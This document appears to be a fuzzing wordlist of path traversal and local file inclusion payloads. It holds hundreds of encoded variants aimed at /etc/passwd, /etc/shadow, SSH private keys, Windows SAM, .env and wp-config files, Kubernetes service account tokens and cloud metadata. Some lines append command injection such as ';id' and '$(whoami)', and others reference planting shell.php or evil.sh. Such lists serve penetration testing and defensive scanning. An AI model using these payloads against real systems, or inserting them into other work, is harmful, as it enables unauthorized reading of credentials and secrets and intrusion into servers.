../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%25252e%25252e%25252fetc%25252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
..%5c..%5cetc%5cpasswd
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd
%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%252e%252e%255cetc%255cpasswd
%252e%252e%255c%252e%252e%255cetc%255cpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%2e%c0%2e%c0%afetc%c0%afpasswd
%c0%2e%c0%2e%c0%af%c0%2e%c0%2e%c0%afetc%c0%afpasswd
%c0%2e%c0%2e/%c0%2e%c0%2e/etc/passwd
%e0%40%ae%e0%40%ae%c0%afetc%c0%afpasswd
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd
%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd
%c0%ae%c0%ae%2fetc%2fpasswd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd
%c0%2e%c0%2e%2fetc%2fpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
%u002e%u002e%u2215etc%u2215passwd
%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
%u002e%u002e%u2216etc%u2216passwd
%u002e%u002e%u2216%u002e%u002e%u2216etc%u2216passwd
..%u2215..%u2215etc%u2215passwd
..%u2216..%u2216etc%u2216passwd
%uff0e%uff0e%u2215etc%u2215passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd
%uFF0E%uFF0E%uFF0Fetc%uFF0Fpasswd
%uFF0E%uFF0E%uFF0F%uFF0E%uFF0E%uFF0Fetc%uFF0Fpasswd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....\/etc/passwd
....\/....\/etc/passwd
....\/....\/....\/etc/passwd
..././etc/passwd
..././..././etc/passwd
..././..././..././etc/passwd
.../.../etc/passwd
.../.../.../etc/passwd
....\/....\/....\/....\/etc/passwd
..//////etc/passwd
..//////..//////etc/passwd
..\\\\etc\\passwd
..\\\\..\\\\etc\\passwd
..\.\./etc/passwd
..\.\/..\.\./etc/passwd
..\.\/..\.\/..\.\./etc/passwd
..;/etc/passwd
..;/..;/etc/passwd
..;/..;/..;/etc/passwd
..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/etc/passwd
...;/etc/passwd
...;/...;/etc/passwd
...;/...;/...;/etc/passwd
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../etc/passwd%00.jpg
../../etc/passwd%00.png
../../etc/passwd%00.pdf
../../etc/passwd%00.txt
../../etc/passwd%00.html
../../etc/passwd%00.php
../../etc/passwd%00.asp
../../etc/passwd%00.aspx
../../etc/passwd%00.jsp
..%00/etc/passwd
..%00/..%00/etc/passwd
..%00/..%00/..%00/etc/passwd
./%00./etc/passwd
./%00./.%00./etc/passwd
%00../etc/passwd
../%00../etc/passwd
../../%00etc/passwd
..%00/..%00/etc%00/passwd
../../etc/passwd%00%00
../../../etc/passwd%00%00
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/mysql/my.cnf
/etc/ssh/sshd_config
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/proc/self/environ
/proc/self/cmdline
/proc/self/status
/proc/version
/proc/net/tcp
/proc/net/udp
/proc/net/arp
/proc/net/route
/proc/net/fib_trie
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/cwd
/proc/self/exe
/proc/self/maps
/proc/self/mem
file:///etc/passwd
file://etc/passwd
file:////etc/passwd
url:file:///etc/passwd
jar:file:///../../etc/passwd
jar:file:///../../../../etc/passwd
../../windows/win.ini
../../../windows/win.ini
../../../../windows/win.ini
../../../../../windows/win.ini
../../windows/system32/drivers/etc/hosts
../../../windows/system32/drivers/etc/hosts
../../windows/system32/config/sam
../../../windows/system32/config/sam
../../boot.ini
../../../boot.ini
../../windows/repair/sam
../../windows/repair/system
c:\windows\win.ini
c:/windows/win.ini
c:\windows\system32\drivers\etc\hosts
c:/windows/system32/drivers/etc/hosts
c:\windows\system32\config\sam
c:/windows/system32/config/sam
\\localhost\c$\windows\win.ini
\\127.0.0.1\c$\windows\win.ini
\\.\c$\windows\win.ini
\\localhost\c$\windows\system32\drivers\etc\hosts
\\127.0.0.1\c$\windows\system32\drivers\etc\hosts
\\.\c$\windows\system32\drivers\etc\hosts
\\localhost\admin$\system32\config\sam
%5c%5clocalhost%5cc$%5cwindows%5cwin.ini
%5c%5c127.0.0.1%5cc$%5cwindows%5cwin.ini
%5c%5c.%5cc$%5cwindows%5cwin.ini
%5c%5clocalhost%5cc$%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
%5c%5c.%5cc$%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
\\localhost\c$\..\..\..\windows\win.ini
\\.\c$\..\..\windows\win.ini
..\/../etc/passwd
..\/../..\/../etc/passwd
..\/../..\/../..\/../etc/passwd
..\/etc/passwd
..\/..\/etc/passwd
..\/..\/..\/etc/passwd
../\etc/passwd
../\../\etc/passwd
../\../\../\etc/passwd
..%2f..%5cetc%2fpasswd
..%2f..%5c..%2fetc%2fpasswd
..%5c..%2fetc%5cpasswd
..%5c..%2f..%5cetc%5cpasswd
%2e%2e%2f%2e%2e%5cetc%2fpasswd
%2e%2e%5c%2e%2e%2fetc%5cpasswd
../../Etc/Passwd
../../../Etc/Passwd
../../ETC/PASSWD
../../../ETC/PASSWD
../../eTc/pAsSwD
../../../eTc/pAsSwD
../../EtC/PaSsWd
..%2FEtc%2FPasswd
..%2F..%2FEtc%2FPasswd
%2E%2e%2Fetc%2Fpasswd
%2E%2E%2fETC%2fPASSWD
%2e%2E%2f%2E%2e%2feTc%2fpAsSwD
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
../../etc/group
../../../etc/group
../../../../etc/group
../../root/.ssh/id_rsa
../../../root/.ssh/id_rsa
../../../../root/.ssh/id_rsa
../../root/.ssh/id_rsa.pub
../../root/.ssh/authorized_keys
../../../root/.ssh/authorized_keys
../../root/.ssh/known_hosts
../../root/.bash_history
../../root/.bashrc
../../home/user/.ssh/id_rsa
../../../home/user/.ssh/id_rsa
../../home/user/.ssh/authorized_keys
../../home/user/.bash_history
../../var/log/apache2/access.log
../../../var/log/apache2/access.log
../../var/log/apache2/error.log
../../var/log/nginx/access.log
../../../var/log/nginx/access.log
../../var/log/nginx/error.log
../../var/log/auth.log
../../../var/log/auth.log
../../var/log/syslog
../../../var/log/syslog
../../var/log/mail.log
../../var/log/vsftpd.log
../../var/log/messages
../../var/log/secure
../../proc/self/cgroup
../../../proc/self/cgroup
../../proc/self/mountinfo
../../proc/self/mounts
../../.dockerenv
../../../.dockerenv
../../var/run/docker.sock
../../var/run/secrets/kubernetes.io/serviceaccount/token
../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt
../../var/run/secrets/kubernetes.io/serviceaccount/namespace
../../var/www/html/.env
../../../var/www/html/.env
../../.env
../../../.env
../../../../.env
../../../../../.env
../../wp-config.php
../../../wp-config.php
../../../../wp-config.php
../../config.php
../../../config.php
../../database.php
../../settings.php
../../configuration.php
../../sites/default/settings.php
../.git/config
../../.git/config
../../../.git/config
../../.git/HEAD
../../.git/index
../../.git/logs/HEAD
../../.svn/entries
../../.svn/wc.db
../../composer.json
../../package.json
../../web.config
../../.htaccess
../../.htpasswd
../../index.php
../../admin.php
../../login.php
../../config/database.yml
../../config/credentials.yml.enc
../../config/secrets.yml
../../config/application.yml
../../settings.py
../../manage.py
../../Gemfile
../../Gemfile.lock
../../var/www/html/index.php
../../var/www/html/.htaccess
../../var/lib/php/sessions/sess_
../../var/lib/php5/sess_
../../tmp/sess_
../../usr/local/apache2/conf/httpd.conf
../../etc/mysql/my.cnf
../../etc/apache2/apache2.conf
../../etc/nginx/nginx.conf
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%2f%252e%252e%2fetc%2fpasswd
%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fpasswd
..%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f..%2fetc%2fpasswd
%252e%252e/%252e%252e/etc/passwd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
%2e%2e%u2215%2e%2e%u2215etc%u2215passwd
%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215passwd
%2e%2e;/%2e%2e;/etc;/passwd
%2e%2e%2f%c0%ae%c0%ae%2f..%2fetc%2fpasswd
%252e%252e%2f%c0%ae%c0%ae%2f..%2f%u002e%u002e%2fetc%2fpasswd
....//..%00/etc/passwd
%2e%2e;/%2e%2e;/etc;/passwd%00
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%00etc%2fpasswd
..%20/..%20/etc/passwd
..%09/..%09/etc/passwd
..%0a/..%0b/etc/passwd
..%0d/..%0d/etc/passwd
..%0d%0a/..%0d%0a/etc/passwd
../../etc/passwd/
../../etc/passwd//
../../etc/passwd///
..%01/..%01/etc/passwd
..%01/..%01/..%01/etc/passwd
../*/../*/etc/passwd
../../*/etc/passwd
..?/..?/etc/passwd
..&/..&/etc/passwd
..!/..!/etc/passwd
..~/..~/etc/passwd
..`/..`/etc/passwd
..#/..#/etc/passwd
../../etc/passwd#
../../etc/passwd?query
..%09..%09..%09etc%09passwd
%252e%252e%u2215%252e%252e%u2215etc%u2215passwd
%252e%252e%u2215%c0%ae%c0%ae%2fetc%2fpasswd
..%2f..%2f%00etc%2fpasswd
%2e%2e%2f%00%2e%2e%2fetc%2fpasswd
%c0%ae%2e%u002e%252e/%c0%ae%2e%u002e%252e/etc/passwd
%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd
%2e%2e%u2215%c0%ae%c0%ae%2f..%2fetc%2fpasswd
....//....//etc/passwd%00
%2e%2e%2f%2e%2e%2f%00etc%2fpasswd
..%u2215..%u2215%00etc%u2215passwd
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%00etc%2fpasswd
..;/..;/%00etc/passwd
....//....//etc/passwd%00.jpg
%252e%252e%u2215%c0%ae%c0%ae%2f....//etc%00/passwd
..%5c%00..%2f%c0%ae%c0%ae/etc/passwd
%2e%2e;/%2e%2e;/%00etc;/passwd
/images/../../../etc/passwd
/static/../../etc/passwd
/assets/../../../etc/passwd
/uploads/../../etc/passwd
/tmp/../../../etc/passwd
/cache/../../etc/passwd
/api/v1/../../etc/passwd
/api/../../../etc/passwd
/app/..;/..;/..;/etc/passwd
/services/pluginscript/..;/..;/..;/getFavicon
/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/.%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
/icons/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
%E3%80%82/%E3%80%82/%E3%80%82/etc/passwd
..%EF%BC%8F..%EF%BC%8Fetc%EF%BC%8Fpasswd
..%u202e/..%u202e/etc/passwd
..%u200B/%u200C/%u200Detc/passwd
%25%32%65%25%32%65%25%32%66etc%25%32%66passwd
%252525252525252e%252525252525252e%252525252525252fetc%252525252525252fpasswd
%2525252525252525252e%2525252525252525252e%2525252525252525252fetc%2525252525252525252fpasswd
......///etc/passwd
......///......///etc/passwd
....\\\etc\passwd
....\\\....\\\etc\passwd
....//....//../....//../etc/passwd
........////etc/passwd
........////........////etc/passwd
........\\\\etc\\passwd
........\\\\........\\\\etc\\passwd
..../\/etc/passwd
..../\/....\/\etc/passwd
....\\/etc/passwd
...\\/...\\/etc/passwd
../../windows/win.ini::$DATA
../../boot.ini::$DATA
../../windows/system32/config/sam::$DATA
../../WINDOW~1/SYSTEM~1/CONFIG/SAM
../../WINDOW~1/WIN.INI
../../PROGRA~1/
../../secret~1/
../../admin~1/
../../backup~1/
../../config~1.php/../../etc/passwd
../../databa~1.php/../../etc/passwd
../../CON
../../PRN
../../AUX
../../NUL
../../COM1
../../LPT1
../../index.php~
../../index.php.bak
../../index.php.old
../../index.php.save
../../index.php.backup
../../config.php~
../../config.php.bak
../../config.php.old
../../database.php.bak
../../wp-config.php.bak
../../.index.php.swp
../../.config.php.swp
&period;&period;/&period;&period;/etc/passwd
&#46;&#46;/&#46;&#46;/etc/passwd
&#x2e;&#x2e;/&#x2e;&#x2e;/etc/passwd
%2e%2e%2f%2e%2e%2f%25%32%65%25%32%65%25%32%66etc%2fpasswd
%252525252e%252525252e%252525252fetc%252525252fpasswd
．．／．．／etc／passwd
‥/‥/etc/passwd
··/··/etc/passwd
ｅｔｃ／ｐａｓｓｗｄ
../../../ｅｔｃ/ｐａｓｓｗｄ
..%5c..%2f..%5cetc%5cpasswd
%2e%2e%5c%2e%2e%2f%2e%2e%5cetc%5cpasswd
..\\../..\\/etc/passwd
../\\../\\../\\etc/passwd
..//\\..//\\..//\\etc/passwd
...\//.../\\.../\/etc/passwd
...\\/...\\/...\\/etc/passwd
%2e%2e%2f%2e%2e%5c%2e%2e%2fetc%2fpasswd
..%2f..%5c..%2f..%5cetc%2fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c0%9v..%c0%9vetc%c0%9vpasswd
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd
/(S(X))/admin/(S(X))/../../etc/passwd
/(G(AAA-BBB)D(CCC=DDD)E(0-1))/../../etc/passwd
/(A(; ))/../../etc/passwd
..//../..///..//etc//passwd
.....////.....////etc////passwd
....\\\....\\\etc\\\passwd
......///......///etc///passwd
..//////..//////..//////etc/passwd
..\\\\..\\\\..\\\\etc\\passwd
..\\\\\\\\..\\\\\\\\etc\\passwd
.../.../.../.../etc/passwd
...//...//../...//etc/passwd
../../etc/passwd;id
../../etc/passwd|whoami
../../etc/passwd`whoami`
../../etc/passwd$(whoami)
../../etc/passwd&&id
../../etc/passwd||id
@169.254.169.254/../../proc/self/environ
@metadata.google.internal/../../etc/passwd
..%2e/..%2e/etc/passwd
%2e./%2e./etc/passwd
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e/%2e%2e/%65tc/%70asswd
%2e%2e%2f%2e%2e%2f%65%74%63/%70%61%73%73%77%64
%2E%2e%2F%2e%2E%2fetC%2FPasSwD
%2e%2E%2f%2E%2e%2feTc%2fpAsSwD
%2E%2E%2f%2e%2e%2fETC%2fPASSWD
..%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a/..%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a/etc/passwd
..////////..////////..////////etc////passwd
..\\\\\\\\..\\\\\\\\..\\\\\\\\etc\\\\passwd
..%2f%2f%2f%2f%2f%2f%2f%2f..%2f%2f%2f%2f%2f%2f%2f%2fetc%2fpasswd
%2e%2e%2f%c0%ae%c0%ae%2f..%2f%u002e%u002e%2fetc%2fpasswd
%252e%252e%2f%c0%ae%c0%ae%2f..%2f%u002e%u002e%2fetc%2fpasswd
..%00/..%00/%00etc/passwd
%2e%2e%2f%c0%ae%c0%ae%2f....//etc%00/passwd
../../../../../../tmp/evil.sh
../../../../../../../../tmp/evil.sh
../../../../../../../../../../tmp/evil.sh
../../../../../../var/www/html/shell.php
../../../../../../../../root/.ssh/authorized_keys
../../../../../../windows/system32/config/sam
..\\..\\..\\..\\..\\windows\\win.ini
..\\..\\..\\..\\windows\\system32\\config\\sam
../../autoexec.bat
../../config.sys
../../inetpub/logs/LogFiles
../../inetpub/wwwroot/web.config
../../inetpub/wwwroot/index.php
../../inetpub/wwwroot/default.aspx
%2fetc%2fpasswd
%5cetc%5cpasswd
file:%2f%2f%2fetc%2fpasswd
url:http://127.0.0.1:8080/../../etc/passwd
..<>/..<>/..<>/etc/passwd
..*/..*/..*//etc/passwd
../../backup.sql
../../database.sql
../../dump.sql
../../backup.zip
../../backup.tar.gz
../../mysql.sql
../../db_backup.sql
../../application/config/database.php
../../application/config/config.php
../../config/database.yml
../../app/config/parameters.yml
../../app/config/security.yml
../../Dockerfile
../../docker-compose.yml
../../requirements.txt
../../Rakefile
../../169.254.169.254/latest/meta-data/
../../169.254.169.254/latest/user-data/
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fpasswd
%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....\/....\/....\/....\/etc/passwd
..././..././..././..././etc/passwd
..\\../..\\../..\\../etc/passwd
..\/..\/..\../etc/passwd
..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
%2e%2e;/%2e%2e;/%2e%2e;/etc;/passwd
%2e%2e;/%2e%2e;/%2e%2e;/%2e%2e;/etc;/passwd
%2e%2e;/%2e%2e;/%2e%2e;/%2e%2e;/%2e%2e;/etc;/passwd
../../etc/passwd%00.php
../../etc/passwd%00.asp
../../etc/passwd%00.aspx
../../etc/passwd%00.jsp
..%2f..%2f..%2fetc%2fpasswd%00
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500
..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
/api/..;/..;/..;/etc/passwd
/api/..;/..;/..;/..;/etc/passwd
/app/..;/..;/..;/etc/passwd
/app/..;/..;/..;/..;/etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
../../../../../../etc/shadow
../../../../../../../etc/shadow
../../../../../../../../etc/shadow
../../../../../../etc/group
../../../../../../../etc/group
../../../../../../../../etc/group
../../../../../../root/.ssh/id_rsa
../../../../../../../root/.ssh/id_rsa
../../../../../../root/.ssh/authorized_keys
../../../../../../var/log/apache2/access.log
../../../../../../var/log/nginx/access.log
../../../../../../var/log/auth.log
../../../../../../proc/self/environ
../../../../../../proc/self/cmdline
..%00..%00..%00etc%00passwd
%2e%2e%00%2e%2e%00%2e%2e%00etc%00passwd
%252e%252e%2500%252e%252e%2500etc%2500passwd
..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
%2e%2e;/%2e%2e;/%2e%2e;/%2e%2e;/%2e%2e;/%2e%2e;/etc;/passwd
../../../../../../../../proc/self/cgroup
../../../../../../../../proc/self/mountinfo
../../../../../../../../proc/self/mounts
../../../../../../../../.dockerenv
../../../../../../../../var/run/docker.sock
../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token
../../../../../../../../../../var/www/html/.env
../../../../../../../../../../.env
../../../../../../../../../../wp-config.php
../../../../../../../../../../config.php
../../../../../../../../../../.git/config
../../../../../../../../../../composer.json
../../../../../../../../../../package.json
/..;/..;/..;/..;/..;/..;/..;/etc/passwd
/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
%uff0e%uff0e%uff0f%uff0e%uff0e%uff0f%uff0e%uff0e%uff0fetc%uff0fpasswd
%u00ae%u00ae%u2215%u00ae%u00ae%u2215etc%u2215passwd
....//....//....//....//....//....//etc/passwd
........////////........////////etc/passwd
..\\\\\\\\..\\\\\\\\..\\\\\\\\etc\\passwd
..%2f%2f%2f%2f..%2f%2f%2f%2f..%2f%2f%2f%2fetc%2fpasswd
%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%252fpasswd
..%5c..%2f..%5c..%2f..%5cetc%5cpasswd
%2e%2e%5c%2e%2e%2f%2e%2e%5c%2e%2e%2fetc%5cpasswd
../../../../../../tmp/sess_
../../../../../../var/lib/php/sessions/sess_
../../../../../../var/lib/php5/sess_
../../../../../../var/log/mail.log
../../../../../../var/log/vsftpd.log
../../../../../../var/log/apache2/error.log
../../../../../../var/log/nginx/error.log
../../../../../../etc/mysql/my.cnf
../../../../../../etc/ssh/sshd_config
../../../../../../etc/apache2/apache2.conf
../../../../../../etc/nginx/nginx.conf
../../sites/default/settings.php
../../../sites/default/settings.php
../../configuration.php
../../../configuration.php
../../settings.py
../../../settings.py
../../manage.py
../../../manage.py
../../node_modules/
../../../node_modules/
..\\..\\..\\..\\..\\..\\windows\\win.ini
..\\..\\..\\..\\..\\..\\windows\\system32\\config\\sam
..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cconfig%5csam
\\localhost\c$\..\..\..\..\..\..\windows\win.ini
\\.\c$\..\..\..\..\..\windows\win.ini
%5c%5clocalhost%5cc$%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
..%u2215..%u2215..%u2215..%u2215etc%u2215passwd
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../etc/passwd%00.bak
../../etc/passwd%00.tmp
../../etc/passwd%00.txt
../../etc/passwd%00.conf
../../etc/passwd%00.log
../../../../../../../../../../windows/win.ini
../../../../../../../../../../windows/system32/config/sam
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/repair/sam
../../../../../../../../../../inetpub/wwwroot/web.config
..%2e%2f..%2e%2f..%2e%2fetc%2fpasswd
%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd
%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
D:\inetpub\wwwroot\global.asa
D:/inetpub/wwwroot/global.asa
/WEB-INF/web.xml
../WEB-INF/web.xml
../../WEB-INF/web.xml
../../../WEB-INF/web.xml
../../../../../../WEB-INF/web.xml
/META-INF/context.xml
../../META-INF/context.xml
/etc/passwd
%00/etc/passwd
%00../../etc/passwd
%00../etc/passwd
..%00/etc/passwd
%0a/bin/cat%20/etc/passwd
%0d%0a/bin/cat%20/etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
boot.ini
/boot.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
%00boot.ini
/../../../../../../../../conf/server.xml
../../../../../../../../../conf/server.xml
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/conf/server.xml
..%252f..%252f..%252fetc/passwd
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
../..%ef%bc%8fetc%ef%bc%8fpasswd
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9cetc%c1%9cpasswd
../../../../../../../../../../../../../../etc/crontab
../../../../../../../../../../../../../../etc/fstab
../../../../../../../../../../../../../../etc/sudoers
../../../../../../../../../../../../../../etc/hosts.allow
../../../../../../../../../../../../../../etc/hosts.deny
../../../../../../../../../../../../../../etc/resolv.conf
../../../../../../../../../../../../../../etc/networks
../../../../../../../../../../../../../../root/.bash_history
../../../../../../../../../../../../../../root/.mysql_history
